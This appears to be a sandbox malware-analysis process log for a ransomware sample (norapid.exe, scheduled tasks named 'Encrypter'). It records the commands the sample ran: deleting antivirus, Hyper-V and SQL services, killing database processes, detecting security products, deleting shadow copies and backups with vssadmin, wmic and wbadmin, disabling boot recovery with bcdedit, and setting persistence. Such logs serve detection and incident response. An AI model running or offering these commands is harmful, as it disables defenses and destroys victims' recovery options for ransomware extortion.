C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KSDE1.0.0"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "kltap"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Trend Micro"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmFilter"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMLWCSService"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmusa"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmPreFilter"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMSmartRelayService"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMiCRCScanService"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "VSApiNt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmCCSF"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmlisten"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmProxy"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ntrtscan"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "UniFi"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ofcservice"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Kill "SQL"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlbrowser.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlwriter.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im msmdsrv.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im MsDtsSrvr.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlceip.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im Ssms.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im SQLAGENT.EXE2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdhost.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im ReportingServicesService.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im msftesql.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im pg_ctl.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im postgres.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Kill2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im UniFi.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" wmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Encrypter /TR C:\Users\Admin\AppData\Roaming\norapid.exe2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC ONLOGON /TN EncrypterSt /TR C:\Users\Admin\AppData\Roaming\norapid.exe2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\rapidrecovery.txt.txt2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {BD538C07-1139-4ACA-8814-435B2182BF93} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\norapid.exeC:\Users\Admin\AppData\Roaming\norapid.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "Hyper-V"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmickvpexchange"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicguestinterface"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicshutdown"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicheartbeat"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicrdv"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "storflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmictimesync"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicvss"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "SQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLSERVERAGENT"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLBrowser"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer130"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SSISTELEMETRY130"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLWriter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerADHelper100"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerOLAPService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer100"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ReportServer"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY$HL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMBMServer"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$PROGID"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$PROGID"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ReportServer$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "msftesql$SQLEXPRESS"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "postgresql-x64-9.4"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Webroot"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "WRSVC"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: ESET"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ekrn"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Kaspersky"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klim6"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "AVP18.0.0"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KLIF"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klpd"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupdisk"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klkbdflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klmouflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klhk"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KSDE1.0.0"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "kltap"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Trend Micro"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmFilter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMLWCSService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmusa"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmPreFilter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMSmartRelayService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMiCRCScanService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "VSApiNt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmCCSF"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmlisten"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmProxy"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ntrtscan"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ofcservice"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "UniFi"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Kill "SQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlbrowser.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlwriter.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im msmdsrv.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im MsDtsSrvr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlceip.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im Ssms.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im SQLAGENT.EXE3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdhost.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im ReportingServicesService.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im msftesql.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im pg_ctl.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im postgres.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Kill3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im UniFi.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE4⤵
-
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" wmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Encrypter /TR C:\Users\Admin\AppData\Roaming\norapid.exe3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC ONLOGON /TN EncrypterSt /TR C:\Users\Admin\AppData\Roaming\norapid.exe3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\rapidrecovery.txt.txt3⤵
-
C:\Users\Admin\AppData\Roaming\norapid.exeC:\Users\Admin\AppData\Roaming\norapid.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "Hyper-V"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmickvpexchange"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicguestinterface"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicshutdown"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicheartbeat"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicrdv"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "storflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmictimesync"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicvss"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "SQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLSERVERAGENT"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLBrowser"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer130"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SSISTELEMETRY130"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLWriter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerADHelper100"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerOLAPService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer100"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ReportServer"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY$HL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMBMServer"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$PROGID"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$PROGID"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ReportServer$OPTIMA"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "msftesql$SQLEXPRESS"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "postgresql-x64-9.4"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Webroot"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "WRSVC"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: ESET"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ekrn"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Kaspersky"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klim6"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "AVP18.0.0"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KLIF"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klpd"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupdisk"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klkbdflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klmouflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klhk"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KSDE1.0.0"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "kltap"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Trend Micro"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmFilter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMLWCSService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmusa"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmPreFilter"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMSmartRelayService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMiCRCScanService"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "VSApiNt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmCCSF"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "tmlisten"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TmProxy"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ntrtscan"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ofcservice"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "UniFi"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Kill "SQL"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlbrowser.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlwriter.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im msmdsrv.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" taskkill -f -im MsDtsSrvr.exe3⤵
-
